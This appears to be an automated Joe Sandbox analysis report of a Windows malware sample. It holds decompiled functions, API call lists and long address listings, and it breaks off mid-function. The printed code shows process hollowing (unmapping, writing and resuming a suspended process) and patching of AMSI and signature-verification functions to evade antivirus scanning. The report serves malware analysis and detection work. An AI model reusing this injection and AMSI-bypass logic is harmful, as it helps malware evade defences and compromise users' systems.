0x03278741
0x03278746
0x0327874b
0x0327874d
0x0327875d
0x03278775
0x03278780
0x0327878e
0x032787a6
0x032787b1
0x032787b2
0x032787bc
0x032787c2
0x032787c7
0x032787c9
0x032787cf
0x032787d4
0x032787d6
0x032787e6
0x032787fe
0x03278809
0x03278817
0x0327882f
0x0327883a
0x0327883b
0x03278840
0x03278845
0x03278847
0x03278857
0x0327886f
0x0327887a
0x03278888
0x032788a0
0x032788ab
0x032788ac
0x032788b1
0x032788b6
0x032788b8
0x032788c8
0x032788e0
0x032788eb
0x032788f9
0x03278911
0x0327891c
0x0327891d
0x03278922
0x03278927
0x03278929
0x03278939
0x03278951
0x0327895c
0x0327896a
0x03278982
0x0327898d
0x0327898e
0x0327899f
0x032789a8
0x032789ae
0x032789b3
0x032789bb
0x032789c1
0x03278bec
0x03278bf2
0x03278bfb
0x03278c06
0x032789c7
0x032789c7
0x032789cc
0x032789ce
0x032789de
0x032789f6
0x03278a01
0x03278a0f
0x03278a27
0x03278a32
0x03278a33
0x03278a38
0x03278a3d
0x03278a3f
0x03278a4f
0x03278a67
0x03278a72
0x03278a80
0x03278a98
0x03278aa3
0x03278aa4
0x03278aa9
0x03278aae
0x03278ab0
0x03278ac0
0x03278ad8
0x03278ae3
0x03278af1
0x03278b09
0x03278b14
0x03278b15
0x03278b1a
0x03278b1f
0x03278b21
0x03278b31
0x03278b49
0x03278b54
0x03278b62
0x03278b7a
0x03278b85
0x03278b86
0x03278b8b
0x03278b94
0x03278ba1
0x03278bcb
0x03278bd3
0x03278bde
0x03278ba3
0x03278baa
0x03278bb2
0x03278bbd
0x03278bbd
0x03278ba1
0x03278c0b
0x03278c12
0x03278c18
0x03278c1d
0x03278c1f
0x03278c2f
0x03278c47
0x03278c52
0x03278c60
0x03278c78
0x03278c83
0x03278c84
0x03278c89
0x03278c8e
0x03278c90
0x03278ca0
0x03278cb8
0x03278cc3
0x03278cd1
0x03278ce9
0x03278cf4
0x03278cf5
0x03278cfa
0x03278cff
0x03278d01
0x03278d11
0x03278d29
0x03278d34
0x03278d42
0x03278d5a
0x03278d65
0x03278d66
0x03278d6b
0x03278d70
0x03278d72
0x03278d82
0x03278d9a
0x03278da5
0x03278db3
0x03278dcb
0x03278dd6
0x03278dd7
0x03278de3
0x03278de5
0x03278ded
0x03278df3
0x03278df9
0x03278dfe
0x03278e00
0x03278e10
0x03278e28
0x03278e33
0x03278e41
0x03278e59
0x03278e64
0x03278e65
0x03278e6a
0x03278e6f
0x03278e71
0x03278e81
0x03278e99
0x03278ea4
0x03278eb2
0x03278eca
0x03278ed5
0x03278ed6
0x03278edb
0x03278ee0
0x03278ee2
0x03278ef2
0x03278f0a
0x03278f15
0x03278f23
0x03278f3b
0x03278f46
0x03278f47
0x03278f4c
0x03278f51
0x03278f53
0x03278f63
0x03278f7b
0x03278f86
0x03278f94
0x03278fac
0x03278fb7
0x03278fb8
0x03278fbd
0x03278fc2
0x03278fcc
0x03278fd3
0x03278fd8
0x03278fdd
0x03278fe3
0x03278fe6
0x03278feb
0x03278fed
0x03278ffd
0x03279015
0x03279020
0x0327902e
0x03279046
0x03279051
0x03279052
0x03279057
0x0327905c
0x0327905e
0x0327906e
0x03279086
0x03279091
0x0327909f
0x032790b7
0x032790c2
0x032790c3
0x032790c8
0x032790cd
0x032790cf
0x032790df
0x032790f7
0x03279102
0x03279110
0x03279128
0x03279133
0x03279134
0x0327913d
0x0327913e
0x0327913f
0x03279147
0x03279148
0x0327914b
0x03279157
0x0327915d
0x03279162
0x03279167
0x03279169
0x03279179
0x03279191
0x0327919c
0x032791aa
0x032791c2
0x032791cd
0x032791ce
0x032791d3
0x032791d8
0x032791da
0x032791ea
0x03279202
0x0327920d
0x0327921b
0x03279233
0x0327923e
0x0327923f
0x03279244
0x03279249
0x0327924b
0x0327925b
0x03279273
0x0327927e
0x0327928c
0x032792a4
0x032792af
0x032792b0
0x032792b0
0x032792b5
0x032792ba
0x032792bc
0x032792cc
0x032792e4
0x032792ef
0x032792fd
0x03279315
0x03279320
0x03279321
0x0327932b
0x03279332
0x03279338
0x0327933e
0x03279343
0x03279348
0x0327934a
0x0327935a
0x03279372
0x0327937d
0x0327938b
0x032793a3
0x032793ae
0x032793af
0x032793b4
0x032793b9
0x032793bb
0x032793cb
0x032793e3
0x032793ee
0x032793fc
0x03279414
0x0327941f
0x03279420
0x03279425
0x0327942a
0x0327942c
0x0327943c
0x03279454
0x0327945f
0x0327946d
0x03279485
0x03279490
0x03279491
0x03279496
0x0327949b
0x0327949d
0x032794ad
0x032794c5
0x032794d0
0x032794de
0x032794f6
0x03279501
0x03279502
0x03279507
0x0327950c
0x0327950e
0x0327951e
0x03279536
0x03279541
0x0327954f
0x03279567
0x03279572
0x03279573
0x03279584
0x0327958d
0x03279593
0x03279598
0x0327959d
0x0327959f
0x032795af
0x032795c7
0x032795d2
0x032795e0
0x032795f8
0x03279603
0x03279604
0x03279609
0x0327960e
0x03279610
0x03279620
0x03279638
0x03279643
0x03279651
0x03279669
0x03279674
0x03279675
0x0327967a
0x0327967f
0x03279681
0x03279691
0x032796a9
0x032796b4
0x032796c2
0x032796da
0x032796e5
0x032796e6
0x032796eb
0x032796f0
0x032796f2
0x03279702
0x0327971a
0x03279725
0x03279733
0x0327974b
0x03279756
0x03279757
0x0327975c
0x03279761
0x03279763
0x03279773
0x0327978b
0x03279796
0x032797a4
0x032797bc
0x032797c7
0x032797c8
0x032797cd
0x032797d5
0x032797d5
0x032797db
0x032797e0
0x032797e5
0x032797e7
0x032797f7
0x0327980f
0x0327981a
0x03279828
0x03279840
0x0327984b
0x0327984c
0x03279851
0x03279856
0x03279858
0x03279868
0x03279880
0x0327988b
0x03279899
0x032798b1
0x032798bc
0x032798bd
0x032798c2
0x032798c7
0x032798c9
0x032798d9
0x032798f1
0x032798fc
0x0327990a
0x03279922
0x0327992d
0x0327992e
0x03279933
0x03279938
0x0327993a
0x0327994a
0x03279962
0x0327996d
0x0327997b
0x03279993
0x0327999e
0x0327999f
0x032799a9
0x032799af
0x032799b4
0x032799b9
0x032799bb
0x032799cb
0x032799e3
0x032799ee
0x032799fc
0x03279a14
0x03279a1f
0x03279a20
0x03279a25
0x03279a2a
0x03279a2c
0x03279a3c
0x03279a54
0x03279a5f
0x03279a6d
0x03279a85
0x03279a90
0x03279a91
0x03279a98
0x03279a9e
0x03279aa3
0x03279aa8
0x03279aaa
0x03279aba
0x03279ad2
0x03279add
0x03279aeb
0x03279b03
0x03279b0e
0x03279b0f
0x03279b14
0x03279b19
0x03279b1b
0x03279b2b
0x03279b43
0x03279b4e
0x03279b5c
0x03279b74
0x03279b7f
0x03279b80
0x03279b8f
0x03279b94
0x03279b99
0x03279b9b
0x03279bab
0x03279bc3
0x03279bce
0x03279bdc
0x03279bf4
0x03279bff
0x03279c00
0x03279c05
0x03279c0a
0x03279c0c
0x03279c1c
0x03279c34
0x03279c3f
0x03279c4d
0x03279c65
0x03279c70
0x03279c71
0x03279c7c
0x03279c81
0x03279c83
0x03279c93
0x03279cab
0x03279cb6
0x03279cc4
0x03279cdc
0x03279ce7
0x03279ce8
0x03279ced
0x03279cf2
0x03279cf4
0x03279d04
0x03279d1c
0x03279d27
0x03279d35
0x03279d4d
0x03279d58
0x03279d59
0x03279d68
0x03279d6d
0x03279d7c
0x03279d81
0x03279d90
0x03279d95
0x03279da4
0x03279da9
0x03279db8
0x03279dbd
0x03279dcc
0x03279dd1
0x03279de0
0x03279de5
0x03279dea
0x03279def
0x03279df1
0x03279e01
0x03279e19
0x03279e24
0x03279e32
0x03279e4a
0x03279e55
0x03279e56
0x03279e5b
0x03279e60
0x03279e62
0x03279e72
0x03279e8a
0x03279e95
0x03279ea3
0x03279ebb
0x03279ec6
0x03279ec7
0x03279ec7
0x03278c12
0x032787c9
0x03278137
0x03279ece
0x03279ed1
0x03279ed4
0x03279ee4
0x03279ef4
0x03279f04
0x03279f0f
0x03279f24

APIs

Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0329E394,0329E384,OpenSession,0329E35C,03279F4C,ScanString,0329E35C), ref: 0327837C
GetThreadContext.KERNEL32(00000000,0329E3D8,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,ScanString,0329E35C), ref: 032787C2
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,0329E4AC,00000004,0329E4B4,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C), ref: 032789AE
NtUnmapViewOfSection.C:\WINDOWS\SYSTEM32\NTDLL(00000000,?,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,-00000008), ref: 03278B9A

Part of subcall function 032779BC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032779C9
Part of subcall function 032779BC: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032779CF

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0329E4B4,ScanString,0329E35C,03279F4C,ScanString,0329E35C,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C), ref: 0327933E
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,0329E4B0,00000004,0329E4B4,ScanBuffer,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,OpenSession,0329E35C,03279F4C,ScanString,0329E35C), ref: 03279593
SetThreadContext.KERNEL32(00000000,0329E3D8,OpenSession,0329E35C,03279F4C,ScanBuffer,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,ScanBuffer,0329E35C), ref: 032799AF
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,ScanBuffer,0329E35C,03279F4C,OpenSession,0329E35C,03279F4C,00000000,0329E3D8,OpenSession,0329E35C,03279F4C,ScanBuffer,0329E35C,03279F4C), ref: 03279A9E

Part of subcall function 03277B14: LoadLibraryW.KERNEL32(bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8,ScanString,0329E35C,03279F4C), ref: 03277B26
Part of subcall function 03277B14: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 03277B33
Part of subcall function 03277B14: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize), ref: 03277B4A
Part of subcall function 03277B14: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8), ref: 03277B59

Strings

BCryptQueryProviderRegistration, xrefs: 03279D72
UacScan, xrefs: 032781C9, 0327866B, 03278847, 03278A3F, 03278C90, 03278E71
BCryptRegisterProvider, xrefs: 03279D86
advapi32, xrefs: 03279DC7
ntdll, xrefs: 03279D9F, 03279DB3, 03279DDB
UacInitialize, xrefs: 03278170, 032783FD, 0327850E, 032785FA, 032787D6, 032789CE, 03278C1F, 03278E00, 03278FED, 032791DA, 0327934A, 0327949D, 0327959F, 032796F2, 032797E7, 03279858
ScanBuffer, xrefs: 03277FF2, 0327838C, 032790CF, 03279169, 0327950E, 03279763, 032798C9, 03279A2C, 03279C0C, 03279DF1
bcrypt, xrefs: 03279D63, 03279D77, 03279D8B
Initialize, xrefs: 0327804B, 03278222, 032786DC, 032788B8, 03278AB0, 03278D01, 03278EE2
I_QueryTagInformation, xrefs: 03279DC2
NtSetSecurityObject, xrefs: 03279DD6
NtOpenObjectAuditAlarm, xrefs: 03279DAE
NtReadVirtualMemory, xrefs: 03279D9A
ScanString, xrefs: 0327827B, 0327857F, 0327874D, 03278929, 03278B21, 03278D72, 03278F53, 032792BC, 032793BB, 03279610, 03279AAA, 03279CF4
BCryptVerifySignature, xrefs: 03279D5E
OpenSession, xrefs: 03277F99, 032780A4, 032782DA, 0327846E, 0327905E, 0327924B, 0327942C, 03279681, 0327993A, 032799BB, 03279B1B, 03279B9B, 03279C83, 03279E62

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressProcThreadWrite$ContextFreeHandleLoadModule$CreateProcessReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 108663649-1058128293
Opcode ID: c45ce273cef75e65b9414b109f0c07d9ff231b1030d9d54f0445a728a65793da
Instruction ID: 6af196b6d041dd6759f0cb70d38c121f5e91e7397dba01be97ca7810b6aa7694
Opcode Fuzzy Hash: c45ce273cef75e65b9414b109f0c07d9ff231b1030d9d54f0445a728a65793da
Instruction Fuzzy Hash: A903FB39A213589FDB11FB65DC90ADE73B9BF45600F1091E2A048AF224DBB09EC6CF51

Uniqueness

Uniqueness Score: -1.00%

Function 032658CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E032658CC(CHAR* __eax, int __edx) {
				CHAR* _v8;
				int _v12;
				CHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				void* _t102;
				intOrPtr* _t103;
				CHAR* _t106;
				CHAR* _t108;
				char* _t109;
				void* _t110;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t108 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t109 = E032658AC( &(_v8[2]));
							if( *_t109 != 0) {
								_t17 = _t109 + 1; // 0x1
								_t108 = E032658AC(_t17);
								if( *_t108 != 0) {
									L10:
									_t102 = _t108 - _v8;
									lstrcpynA( &_v599, _v8, _t102 + 1);
									while( *_t108 != 0) {
										_t106 = E032658AC( &(_t108[1]));
										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
													_t108 = _t106;
													continue;
												}
											}
										}
										goto L17;
									}
									lstrcpynA(_v8,  &_v599, _v12);
								}
							}
						}
					}
				} else {
					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t103 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t103() == 0) {
							goto L4;
						} else {
							lstrcpynA(_v8,  &_v599, _v12);
						}
					}
				}
				L17:
				return _v16;
			}

0x032658d8
0x032658db
0x032658e1
0x032658ee
0x032658f5
0x0326593a
0x03265940
0x0326597d
0x00000000
0x03265942
0x03265949
0x0326595a
0x0326595f
0x03265965
0x0326596d
0x03265972
0x03265980
0x03265982
0x03265994
0x03265a45
0x032659a6
0x032659b4
0x032659ca
0x032659e2
0x032659e9
0x032659ef
0x03265a0b
0x03265a0d
0x03265a2f
0x03265a41
0x03265a43
0x00000000
0x03265a43
0x03265a0b
0x032659e9
0x00000000
0x032659b4
0x03265a5d
0x03265a5d
0x03265972
0x0326595f
0x03265949
0x032658f7
0x03265905
0x03265909
0x00000000
0x0326590b
0x0326590b
0x03265916
0x0326591a
0x0326591f
0x00000000
0x03265921
0x03265930
0x03265930
0x0326591f
0x03265909
0x03265a62
0x03265a6b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,03266BF8,03260000,03289790), ref: 032658E9
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 03265900
lstrcpynA.KERNEL32(?,?,?), ref: 03265930
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 03265994
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659CA
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659DD
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659EF
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659FB
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000), ref: 03265A2F
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8), ref: 03265A3B
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 03265A5D

Strings

GetLongPathNameA, xrefs: 032658F7
\, xrefs: 03265A0D
kernel32.dll, xrefs: 032658E4

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 1a5f19c2572a8e162bb2100219df5ab0d5038bc0ecd6f33ad1ac33a9349a403d
Instruction ID: 0c1c0c0c6feafb23720ae3b28c7b7988dbdbcca12baa439854ba94dd0fbc6686
Opcode Fuzzy Hash: 1a5f19c2572a8e162bb2100219df5ab0d5038bc0ecd6f33ad1ac33a9349a403d
Instruction Fuzzy Hash: 41416072D10219AFDB10DEE8CC88ADEB7FCAF09250F2845A5A545D7241E6B0EFD08B54

Uniqueness

Uniqueness Score: -1.00%

Function 0327CFB0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 249
processnativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0327CFB0(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				intOrPtr _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				WCHAR* _t138;
				void* _t211;
				intOrPtr _t213;
				void* _t223;
				void* _t226;
				void* _t229;
				void* _t237;
				void* _t240;
				void* _t250;
				void* _t253;
				void* _t256;
				void* _t259;
				intOrPtr _t260;
				void* _t266;
				void* _t270;
				intOrPtr _t272;
				intOrPtr _t273;

				_t272 = _t273;
				_t213 = 0x39;
				do {
					_push(0);
					_push(0);
					_t213 = _t213 - 1;
					_t274 = _t213;
				} while (_t213 != 0);
				_push(_t213);
				_t1 =  &_v8;
				_t214 =  *_t1;
				 *_t1 = _t213;
				_t270 = __edx;
				_t211 = __eax;
				_push(_t272);
				_push(0x327d3c0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t273;
				E03264698( &_v352, "AmsiOpenSession");
				_push(_v352);
				E03264698( &_v356, "Amsi");
				_pop(_t223);
				E03277C04(_v356,  *_t1, _t223, _t274);
				E03264698( &_v360, "AmsiUacScan");
				_push(_v360);
				E03264698( &_v364, "Amsi");
				_pop(_t226);
				E03277C04(_v364, _t214, _t226, _t274);
				E03264698( &_v368, "AmsiScanString");
				_push(_v368);
				E03264698( &_v372, "Amsi");
				_pop(_t229);
				E03277C04(_v372, _t214, _t229, _t274);
				_push(0x327d410);
				E03264704( &_v380, _t211, _t274);
				_push(_v380);
				_push(0x327d41c);
				E03264704( &_v384, _t270, _t274);
				_push(_v384);
				E03264824();
				E0326473C( &_v348, 0xff, _v376);
				E03263098( &_v76, 0x44);
				_v76.cb = 0x44;
				_v76.dwFlags = 1;
				_v76.wShowWindow =  *_t1;
				E03264698( &_v388, "AmsiScanString");
				_push(_v388);
				E03264698( &_v392, "Amsi");
				_pop(_t237);
				E03277C04(_v392, 0, _t237, _t274);
				E03264698( &_v396, "AmsiScanBuffer");
				_push(_v396);
				E03264698( &_v400, "Amsi");
				_pop(_t240);
				E03277C04(_v400, 0, _t240, _t274);
				E03264704( &_v412, _t211, _t274);
				E03267F10(_v412,  &_v408);
				E03264D38( &_v404, E03264964(_v408));
				_t138 = E03264DB4(_v404);
				E03264704( &_v420,  &_v348, _t274);
				E03264D38( &_v416, E03264964(_v420));
				CreateProcessAsUserW( *0x3392794, 0, E03264DB4(_v416), 0, 0, 0, 0x30, 0, _t138,  &_v76,  &_v92);
				_push(0x327d438);
				_push( *0x33928a8);
				_push("ScanBuffer");
				E03264824();
				E03264698( &_v424, E03264964(_v428));
				_push(_v424);
				_t217 =  *0x33928a8;
				E032647B0( &_v436,  *0x33928a8, 0x327d438);
				E03264698( &_v432, E03264964(_v436));
				_pop(_t250);
				E03277C04(_v432,  *0x33928a8, _t250, _t274);
				NtCreateProcess(_v92.hProcess, 0x1f0fff, 0x33928d8, 0, 1, 0, 0, 0);
				E03264698( &_v440, "AmsiUacScan");
				_push(_v440);
				E03264698( &_v444, "Amsi");
				_pop(_t253);
				E03277C04(_v444, _t217, _t253, _t274);
				E03264698( &_v448, "AmsiUacInitialize");
				_push(_v448);
				E03264698( &_v452, "Amsi");
				_pop(_t256);
				E03277C04(_v452, _t217, _t256, _t274);
				E03264698( &_v456, "AmsiScanBuffer");
				_push(_v456);
				E03264698( &_v460, "Amsi");
				_pop(_t259);
				E03277C04(_v460, _t217, _t259, _t274);
				_t275 = _v5;
				if(_v5 != 0) {
					E03264698( &_v464, "AmsiOpenSession");
					_push(_v464);
					E03264698( &_v468, "Amsi");
					_pop(_t266);
					E03277C04(_v468, _t217, _t266, _t275);
					WaitForSingleObject(_v92.hProcess, 0xffffffff);
					CloseHandle(_v92);
					CloseHandle(_v92.hThread);
				}
				_pop(_t260);
				 *[fs:eax] = _t260;
				_push(0x327d3c7);
				E032644C4( &_v468, 0xd);
				E03264C24( &_v416);
				E032644C4( &_v412, 2);
				E03264C24( &_v404);
				return E032644C4( &_v400, 0xd);
			}

0x0327cfb1
0x0327cfb4
0x0327cfb9
0x0327cfb9
0x0327cfbb
0x0327cfbd
0x0327cfbd
0x0327cfbd
0x0327cfc0
0x0327cfc1
0x0327cfc1
0x0327cfc1
0x0327cfc9
0x0327cfcb
0x0327cfcf
0x0327cfd0
0x0327cfd5
0x0327cfd8
0x0327cfe6
0x0327cff1
0x0327cffd
0x0327d008
0x0327d009
0x0327d019
0x0327d024
0x0327d030
0x0327d03b
0x0327d03c
0x0327d04c
0x0327d057
0x0327d063
0x0327d06e
0x0327d06f
0x0327d074
0x0327d081
0x0327d086
0x0327d08c
0x0327d099
0x0327d09e
0x0327d0af
0x0327d0c5
0x0327d0d4
0x0327d0d9
0x0327d0e0
0x0327d0e7
0x0327d0f6
0x0327d101
0x0327d10d
0x0327d118
0x0327d119
0x0327d129
0x0327d134
0x0327d140
0x0327d14b
0x0327d14c
0x0327d161
0x0327d172
0x0327d18a
0x0327d195
0x0327d1b1
0x0327d1c9
0x0327d1e2
0x0327d1e7
0x0327d1ec
0x0327d1f2
0x0327d202
0x0327d21a
0x0327d225
0x0327d22c
0x0327d237
0x0327d24f
0x0327d25a
0x0327d25b
0x0327d278
0x0327d288
0x0327d293
0x0327d29f
0x0327d2aa
0x0327d2ab
0x0327d2bb
0x0327d2c6
0x0327d2d2
0x0327d2dd
0x0327d2de
0x0327d2ee
0x0327d2f9
0x0327d305
0x0327d310
0x0327d311
0x0327d316
0x0327d31a
0x0327d327
0x0327d332
0x0327d33e
0x0327d349
0x0327d34a
0x0327d355
0x0327d35e
0x0327d367
0x0327d367
0x0327d36e
0x0327d371
0x0327d374
0x0327d384
0x0327d38f
0x0327d39f
0x0327d3aa
0x0327d3bf

APIs

CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,?,?,?,?,?), ref: 0327D1E2

Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82

NtCreateProcess.N(?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000,00000000,00000000,00000000,00000000), ref: 0327D278
WaitForSingleObject.KERNEL32(?,000000FF,?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000,00000000,00000000), ref: 0327D355
CloseHandle.KERNEL32(?,?,000000FF,?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000,00000000), ref: 0327D35E
CloseHandle.KERNEL32(?,?,?,000000FF,?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000), ref: 0327D367

Strings

Amsi, xrefs: 0327CFF8, 0327D02B, 0327D05E, 0327D108, 0327D13B, 0327D29A, 0327D2CD, 0327D300, 0327D339
ScanBuffer, xrefs: 0327D1F2
AmsiUacScan, xrefs: 0327D014, 0327D283
D, xrefs: 0327D0D9
AmsiUacInitialize, xrefs: 0327D2B6
AmsiScanBuffer, xrefs: 0327D124, 0327D2E9
AmsiOpenSession, xrefs: 0327CFE1, 0327D322
AmsiScanString, xrefs: 0327D047, 0327D0F1

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: Handle$CloseCreateLibraryProcess$AddressFreeLoadModuleObjectProcSingleUserWait
String ID: Amsi$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$D$ScanBuffer
API String ID: 1036135174-2335947617
Opcode ID: a45d5ce8e887e7ae3d9214b30f4fc3560b09f1ff5ec584f0f088cd87e4b4de5f
Instruction ID: d4dbaa9fa4a45279f60d2200d50f051b92cea35a0dcc1d596af8c1d0bf227f4b
Opcode Fuzzy Hash: a45d5ce8e887e7ae3d9214b30f4fc3560b09f1ff5ec584f0f088cd87e4b4de5f
Instruction Fuzzy Hash: 9CA1FF39A2131D9FDB11FB65CC80BDEB3B9AF49300F5045D2A548AB254DBB4AEC58F50

Uniqueness

Uniqueness Score: -1.00%

Function 03265B9C Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03265B9C() {
				void* _t32;
				CHAR* _t56;
				CHAR* _t57;
